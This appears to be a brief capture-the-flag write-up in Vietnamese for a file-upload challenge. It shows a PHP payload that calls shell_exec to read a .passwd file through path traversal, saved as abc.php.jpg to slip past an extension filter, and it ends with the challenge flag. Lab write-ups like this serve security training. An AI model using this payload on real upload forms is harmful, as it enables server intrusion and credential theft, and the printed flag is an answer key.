# File Upload - Double Extensions

Viết một file có nội dung như sau:

```php
<?php
	$output = shell_exec('cat ../../../.passwd');
	echo "<pre>$output</pre>";
?>
```

Sau đó lưu thành abc.php.jpg

Upload lên 

---

### Flag:

`Gg9LRz-hWSxqqUKd77-_q-6G8`